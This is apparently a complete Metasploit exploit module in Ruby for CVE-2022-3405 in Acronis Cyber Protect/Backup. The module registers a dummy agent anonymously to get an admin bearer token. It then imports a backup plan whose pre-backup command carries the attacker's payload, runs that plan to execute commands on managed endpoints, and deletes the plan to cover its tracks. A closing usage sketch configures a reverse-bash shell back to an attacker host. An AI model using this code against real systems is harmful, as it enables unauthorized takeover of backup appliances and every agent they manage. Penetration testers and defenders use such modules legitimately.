##
# https://sploitus.com/exploit?id=PACKETSTORM:182937
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Exploit::Remote::HTTP::AcronisCyber  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Acronis Cyber Protect/Backup remote code execution',  
'Description' => %q{  
Acronis Cyber Protect or Backup is an enterprise backup/recovery solution for compute,
storage, and application resources. Businesses and service providers use it to protect
and back up all IT assets in their environment.
The Acronis Cyber Protect appliance, in its default configuration, allows the anonymous
registration of new protect/backup agents on new endpoints. This API endpoint also
generates bearer tokens which the agent then uses to authenticate to the appliance.
Because the management web console runs on the same port as the agent API, this
bearer token is also valid for any action in the web console. This allows an attacker
with network access to the appliance to start the registration of a new agent and retrieve
a bearer token that provides admin access to the functions available in the web console.
  
The web console offers multiple ways to execute arbitrary commands on both the
agents (e.g., via PreCommands for a backup) and the appliance itself (e.g., via a Validation
job on the appliance's own agent). These options can easily be set with the provided bearer
token, which leads to a complete compromise of all agents and of the appliance itself.
  
You can either use the module `auxiliary/gather/acronis_cyber_protect_machine_info_disclosure`
to collect target information for exploitation in this module, or run this module standalone;
it will then try to exploit the first online endpoint that matches the target and payload
settings configured in the module.
  
Acronis Cyber Protect 15 (Windows, Linux) before build 29486 and  
Acronis Cyber Backup 12.5 (Windows, Linux) before build 16545 are vulnerable.  
},  
'Author' => [  
'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module  
'Sandro Tolksdorf of usd AG.' # discovery  
],  
'References' => [  
['CVE', '2022-3405'],  
['URL', 'https://herolab.usd.de/security-advisories/usd-2022-0008/'],  
['URL', 'https://attackerkb.com/topics/WVI3r5eNIc/cve-2022-3405']  
],  
'License' => MSF_LICENSE,  
'Platform' => ['unix', 'linux', 'windows'],  
'Privileged' => true,  
'Arch' => [ARCH_CMD],  
'Targets' => [  
[  
'Unix/Linux Command',  
{  
'Platform' => ['unix', 'linux'],  
'Arch' => ARCH_CMD,  
'Type' => :unix_cmd  
}  
],  
[  
'Windows Command',  
{  
'Platform' => ['windows'],  
'Arch' => ARCH_CMD,  
'Type' => :win_cmd  
}  
]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => '2022-11-08',  
'DefaultOptions' => {  
'SSL' => true,  
'RPORT' => 9877  
},  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],  
'Reliability' => [REPEATABLE_SESSION]  
}  
)  
)  
register_options([  
OptString.new('TARGETURI', [true, 'The URI of the vulnerable Acronis Cyber Protect/Backup instance', '/']),  
OptString.new('HOSTID', [false, 'hostId value collected from recon module "auxiliary/gather/acronis_cyber_protect_machine_info_disclosure"', '']),  
OptString.new('PARENTID', [false, 'parentId value collected from recon module "auxiliary/gather/acronis_cyber_protect_machine_info_disclosure"', '']),  
OptString.new('KEY', [false, 'key value collected from recon module "auxiliary/gather/acronis_cyber_protect_machine_info_disclosure"', '']),  
OptEnum.new('OUTPUT', [true, 'Output format to use', 'none', ['none', 'json']])  
])  
end  
  
# create and import backup plan data with payload  
# returns nil if not successful  
def create_and_import_backup_plan(hostid, parentid, key, payload, access_token2)  
id = Faker::Internet.uuid  
name = Rex::Text.rand_text_alphanumeric(5..8).downcase  
  
# we need to split the payload into the command and its arguments,
# otherwise command execution does not work for Windows targets
cmd_line = payload.split(' ', 2)  
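# e.g. a payload of 'powershell -nop -c ...' splits into command 'powershell' and arguments '-nop -c ...'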
  
case target['Type']  
when :unix_cmd  
source_dir = '/home'  
target_dir = '/tmp'  
when :win_cmd  
source_dir = 'c:/users/public'  
target_dir = 'c:/windows/temp'  
else  
# probably macOS or other unix version  
source_dir = '/home'  
target_dir = '/tmp'  
end  
  
plan_data = {  
allowedActions: ['rename', 'revoke', 'runNow'],  
allowedBackupTypes: ['full', 'incremental'],  
backupType: 'files',  
bootableMediaPlan: false,  
editable: true,  
enabled: true,  
id: id.to_s,  
locations: { data: [{ displayName: target_dir.to_s, id: "[[\"ItemType\",\"local_folder\"],[\"LocalID\",\"#{target_dir}\"]]", type: 'local_folder' }] },  
name: name.to_s,  
options: {  
backupOptions: {  
prePostCommands: {  
postCommands: { command: '', commandArguments: '', continueOnCommandError: false, waitCommandComplete: true, workingDirectory: '' },  
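# the payload is injected below as the plan's pre-backup command, so it runs on the agent when the plan is executed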
preCommands: {  
command: cmd_line[0].to_s,  
commandArguments: cmd_line[1].to_s,  
continueOnCommandError: true,  
waitCommandComplete: false,  
workingDirectory: ''  
},  
useDefaultCommands: false,  
usePostCommands: false,  
usePreCommands: true  
},  
prePostDataCommands: {  
postCommands: { command: '', commandArguments: '', continueOnCommandError: false, waitCommandComplete: true, workingDirectory: '' },  
preCommands: { command: '', commandArguments: '', continueOnCommandError: false, waitCommandComplete: true, workingDirectory: '' },  
useDefaultCommands: true,  
usePostCommands: false,  
usePreCommands: false  
},  
scheduling: { interval: { type: 'minutes', value: 30 }, type: 'distributeBackupTimeOptions' },  
simultaneousBackups: { simultaneousBackupsNumber: nil },  
snapshot: {  
quiesce: true,  
retryConfiguration: {  
reattemptOnError: true,  
reattemptTimeFrame: { type: 'minutes', value: 5 },  
reattemptsCount: 3,  
silentMode: false  
}  
},  
tapes: { devices: [], overwriteDataOnTape: false, preserveTapesPosition: true, tapeSet: '' },  
taskExecutionWindow: {},  
taskFailureHandling: { periodBetweenRetryAttempts: { type: 'hours', value: 1 }, retryAttempts: 1, retryFailedTask: false },  
taskStartConditions: { runAnyway: false, runAnywayAfterPeriod: { type: 'hours', value: 1 }, waitUntilMet: true },  
validateBackup: false,  
volumes: {  
forceVssFullBackup: false,  
useMultiVolumeSnapshot: true,  
useNativeVssProvider: false,  
useVolumeShadowService: true,  
useVssFlags: ['definedRule']  
},  
vssFlags: { availableVssModes: ['auto', 'system'], enabled: true, value: 'auto', vssFullBackup: false },  
windowsEventLog: { isGlobalConfigurationUsed: true, traceLevel: 'warning', traceState: false },  
withHWSnapshot: false  
},  
specificParameters: { inclusionRules: { rules: [ source_dir.to_s ], rulesType: 'centralizedFiles' }, type: '' }  
},  
origin: 'centralized',  
route: {  
archiveSlicing: nil,  
stages: [  
{  
archiveName: '[Machine Name]-[Plan ID]-[Unique ID]A',  
cleanUpIfNoSpace: false,  
cleanup: {  
time: [  
{ backupSet: 'daily', period: { type: 'days', value: 7 } },  
{ backupSet: 'weekly', period: { type: 'weeks', value: 4 } }  
],  
type: 'cleanupByTime'  
},  
destinationKind: 'local_folder',  
locationScript: nil,  
locationUri: target_dir.to_s,  
locationUriType: 'local',  
maintenanceWindow: nil,  
postAction: {  
convertToVMParameters: {  
agentIds: [],  
cpuCount: nil,  
diskAllocationType: 'thick',  
displayedName: nil,  
enabled: false,  
exactMemorySize: false,  
infrastructureType: '',  
memorySize: nil,  
networkAdapters: [],  
virtualMachineName: '',  
virtualServerHost: nil,  
virtualServerHostKey: '[["ItemType",""],["LocalID",""]]',  
virtualServerStorage: ''  
}  
},  
rules: [  
{  
afterBackup: true,  
backupCountUpperLimit: 0,  
backupSetIndex: 'daily',  
backupUpperLimitSize: 0,  
beforeBackup: false,  
consolidateBackup: false,  
deleteOlderThan: { type: 'days', value: 7 },  
deleteYongerThan: { type: 'days', value: 0 },  
onSchedule: false,  
retentionSchedule: {  
alarms: [],  
conditions: [],  
maxDelayPeriod: -1,  
maxRetries: 0,  
preventFromSleeping: true,  
retryPeriod: 0,  
type: 'none',  
unique: false,  
waitActionType: 'run'  
},  
stagingOperationType: 'justCleanup'  
},  
{  
afterBackup: true,  
backupCountUpperLimit: 0,  
backupSetIndex: 'weekly',  
backupUpperLimitSize: 0,  
beforeBackup: false,  
consolidateBackup: false,  
deleteOlderThan: { type: 'weeks', value: 4 },  
deleteYongerThan: { type: 'days', value: 0 },  
onSchedule: false,  
retentionSchedule: {  
alarms: [],  
conditions: [],  
maxDelayPeriod: -1,  
maxRetries: 0,  
preventFromSleeping: true,  
retryPeriod: 0,  
type: 'none',  
unique: false,  
waitActionType: 'run'  
},  
stagingOperationType: 'justCleanup'  
}  
],  
useProtectionPlanCredentials: true,  
validationRules: nil  
}  
]  
},  
scheme: {  
parameters: {  
backupSchedule: {  
kind: { dataType: 'binary', type: 'full' },  
schedule: {  
alarms: [  
{  
beginDate: { day: 0, month: 0, year: 0 },  
calendar: { days: 65, type: 'weekly', weekInterval: 0 },  
distribution: { enabled: false, interval: 0, method: 0 },  
endDate: { day: 0, month: 0, year: 0 },  
machineWake: false,  
repeatAtDay: { endTime: { hour: 0, minute: 0, second: 0 }, timeInterval: 0 },  
runLater: false,  
skipOccurrences: 0,  
startTime: { hour: 23, minute: 0, second: 0 },  
startTimeDelay: 0,  
type: 'time',  
utcBasedSettings: false  
}  
],  
conditions: [],  
maxDelayPeriod: -1,  
maxRetries: 0,  
preventFromSleeping: true,  
retryPeriod: 0,  
type: 'daily',  
unique: false,  
waitActionType: 'run'  
}  
},  
backupTypeRule: 'byScheme'  
},  
schedule: {  
daysOfWeek: ['monday', 'tuesday', 'wednesday', 'thursday', 'friday'],  
effectiveDates: { from: { day: 0, month: 0, year: 0 }, to: { day: 0, month: 0, year: 0 } },  
machineWake: false,  
preventFromSleeping: true,  
runLater: false,  
startAt: { hour: 23, minute: 0, second: 0 },  
type: 'daily'  
},  
type: 'weekly_full_daily_inc'  
},  
sources: { data: [{ displayName: name.to_s, hostID: hostid.to_s, id: key.to_s }] },  
target: { inclusions: [{ key: key.to_s, resource_key: key.to_s }] },  
tenant: { id: parentid.to_s, locator: "/#{parentid}/", name: parentid.to_s, parentID: '' }  
}.to_json  
  
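# the plan JSON is uploaded as a multipart 'planfile' attachment to the AMS plan import endpoint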
form_data = Rex::MIME::Message.new  
form_data.add_part(plan_data, 'application/json', nil, "form-data; name=\"planfile\"; filename=\"#{Rex::Text.rand_text_alpha(4..8)}.json\"")  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'api', 'ams', 'backup', 'plan_operations', 'import'),  
'ctype' => "multipart/form-data; boundary=#{form_data.bound}",  
'headers' => {  
'X-Requested-With' => 'XMLHttpRequest',  
'Authorization' => "bearer #{access_token2}"  
},  
'data' => form_data.to_s,  
'vars_get' => {  
'CreateDraftOnError' => true  
}  
})  
return unless res&.code == 200 && res.body.include?('planId') && res.body.include?('importedPlans')  
  
# parse json response and return planId  
res_json = res.get_json_document  
return if res_json.blank?  
  
res_json.dig('data', 'importedPlans', 0, 'planId')  
end  
  
# remove the backup plan on the target including the payload  
# returns true if successful  
def remove_backup_plan(access_token2)  
post_data = {  
planIds: [@planid.to_s]  
}.to_json  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'api', 'ams', 'backup', 'plans_operations', 'remove_plans'),  
'ctype' => 'application/json',  
'headers' => {  
'X-Requested-With' => 'XMLHttpRequest',  
'Authorization' => "bearer #{access_token2}"  
},  
'data' => post_data.to_s  
})  
return false unless res&.code == 200  
  
true  
end  
  
# execute the backup plan on the target including the payload  
# returns true if successful  
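# running the plan triggers its pre-backup command, which executes the payload on the selected agent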
def execute_command(access_token2, _opts = {})  
post_data = {  
planId: @planid.to_s  
}.to_json  
  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(target_uri.path, 'api', 'ams', 'backup', 'plan_operations', 'run'),  
'ctype' => 'application/json',  
'headers' => {  
'X-Requested-With' => 'XMLHttpRequest',  
'Authorization' => "bearer #{access_token2}"  
},  
'data' => post_data.to_s  
})  
return false unless res&.code == 200  
  
true  
end  
  
def cleanup  
# try to remove imported backup plan with payload to cover our tracks  
# but do not run during the check phase  
super  
unless @check_running  
if remove_backup_plan(@access_token2)  
print_good('Backup plan was successfully removed.')  
else  
print_warning('Backup plan could not be removed. Remove it manually.')  
end  
end  
end  
  
def check  
@check_running = true  
# initial check on api access  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => normalize_uri(target_uri.path, 'api', 'meta'),  
'ctype' => 'application/json'  
})  
return Exploit::CheckCode::Unknown('No Acronis API access found!') unless res&.code == 200 && res.body.include?('uri') && res.body.include?('method')  
  
# get first access token  
print_status('Retrieve the first access token.')  
@access_token1 = get_access_token1  
vprint_status("Extracted first access token: #{@access_token1}")  
return Exploit::CheckCode::Unknown('Retrieval of the first access token failed.') if @access_token1.nil?  
  
# register a dummy agent  
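# anonymous agent registration is the core of CVE-2022-3405: the returned client credentials yield a token that the management console also accepts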
client_id = Faker::Internet.uuid  
print_status('Register a dummy backup agent.')  
client_secret = dummy_agent_registration(client_id, @access_token1)  
return Exploit::CheckCode::Unknown('Registering a dummy agent failed.') if client_secret.nil?  
  
print_status('Dummy backup agent registration was successful.')  
  
# get second access_token  
print_status('Retrieve the second access token.')  
@access_token2 = get_access_token2(client_id, client_secret)  
vprint_status("Extracted second access token: #{@access_token2}")  
return Exploit::CheckCode::Unknown('Retrieval of the second access token failed.') if @access_token2.nil?  
  
# get version info  
version = get_version_info(@access_token2)  
return Exploit::CheckCode::Unknown('Cannot find any version information.') if version.nil?  
  
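# version strings look like 15.0.<build> or 12.5.<build>; builds before 29486 (15.0) and 16545 (12.5) are vulnerable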
release = version.match(/(.+)\.(\d+)/)  
return Exploit::CheckCode::Unknown("Unexpected version format: #{version}") if release.nil?  
  
case release[1]  
when '15.0'  
if Rex::Version.new(version) < Rex::Version.new('15.0.29486')  
return Exploit::CheckCode::Appears("Acronis Cyber Protect/Backup #{version}")  
else  
return Exploit::CheckCode::Safe("Acronis Cyber Protect/Backup #{version}")  
end  
when '12.5'  
if Rex::Version.new(version) < Rex::Version.new('12.5.16545')  
return Exploit::CheckCode::Appears("Acronis Cyber Protect/Backup #{version}")  
else  
return Exploit::CheckCode::Safe("Acronis Cyber Protect/Backup #{version}")  
end  
else  
Exploit::CheckCode::Safe("Acronis Cyber Protect/Backup #{version}")  
end  
end  
  
def exploit  
@check_running = false  
# check if @access_token2 is already set as part of autocheck option  
if @access_token2.nil?  
# get first access token  
print_status('Retrieve the first access token.')  
@access_token1 = get_access_token1  
vprint_status("Extracted first access token: #{@access_token1}")  
fail_with(Failure::NoAccess, 'Retrieval of the first access token failed.') if @access_token1.nil?  
  
# register a dummy agent  
client_id = Faker::Internet.uuid  
print_status('Register a dummy backup agent.')  
client_secret = dummy_agent_registration(client_id, @access_token1)  
fail_with(Failure::BadConfig, 'Registering a dummy agent failed.') if client_secret.nil?  
print_status('Dummy backup agent registration was successful.')  
  
# get second access_token  
print_status('Retrieve the second access token.')  
@access_token2 = get_access_token2(client_id, client_secret)  
vprint_status("Extracted second access token: #{@access_token2}")  
fail_with(Failure::NoAccess, 'Retrieval of the second access token failed.') if @access_token2.nil?  
end  
  
# if hostid, parentid and key are blank, fetch the first managed online endpoint defined at the appliance matching the module target setting  
hostid = datastore['HOSTID']  
parentid = datastore['PARENTID']  
key = datastore['KEY']  
if hostid.blank? || parentid.blank? || key.blank?  
print_status('Retrieve first online target registered at the Acronis Cyber Protect/Backup appliance.')  
res_json = get_machine_info(@access_token2)  
fail_with(Failure::NotFound, 'Cannot find any configuration information.') if res_json.nil?  
  
# find first online target matching the module target settings  
res_json['data'].each do |item|  
next unless item['type'] == 'machine' && item['online'] && ((item['osType'] == 'linux' && target['Type'] == :unix_cmd) || (item['osType'] == 'windows' && target['Type'] == :win_cmd))  
  
print_status("Found online target matching your target setting #{target.name}.")  
print_good("hostId: #{item['hostId']}") unless item['hostId'].nil?  
print_good("parentId: #{item['parentId']}") unless item['parentId'].nil?  
print_good("key: #{item['id']}") unless item['id'].nil?  
print_status("type: #{item['type']}") unless item['type'].nil?  
print_status("hostname: #{item['title']}") unless item['title'].nil?  
print_status("IP: #{item.dig('ip', 0)}") unless item.dig('ip', 0).nil?  
print_status("OS: #{item['os']}") unless item['os'].nil?  
print_status("ARCH: #{item['osType']}") unless item['osType'].nil?  
print_status("ONLINE: #{item['online']}") unless item['online'].nil?  
hostid = item['hostId']  
parentid = item['parentId']  
key = item['id']  
break  
end  
end  
fail_with(Failure::NotFound, "No target available matching your target setting #{target.name}.") if hostid.blank? || parentid.blank? || key.blank?  
  
# create and import backup plan with payload  
print_status("Import backup plan with payload for target with hostId: #{hostid}.")  
@planid = create_and_import_backup_plan(hostid, parentid, key, payload.encoded, @access_token2)  
fail_with(Failure::BadConfig, 'Importing backup plan with payload failed.') if @planid.nil?  
  
print_status("Executing #{target.name} with payload #{datastore['PAYLOAD']}")  
case target['Type']  
when :unix_cmd, :win_cmd  
execute_command(@access_token2)  
end  
end  
end
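
# Example usage sketch (the module path below is an assumption; adjust it to wherever this
# module is installed in your Metasploit tree):
#   msf6 > use exploit/multi/http/acronis_cyber_protect_backup_rce
#   msf6 exploit(...) > set RHOSTS 192.0.2.10
#   msf6 exploit(...) > set PAYLOAD cmd/unix/reverse_bash
#   msf6 exploit(...) > set LHOST 192.0.2.1
#   msf6 exploit(...) > run
# SSL is enabled and RPORT defaults to 9877 via DefaultOptions; HOSTID, PARENTID, and KEY are
# optional and can be collected with auxiliary/gather/acronis_cyber_protect_machine_info_disclosure.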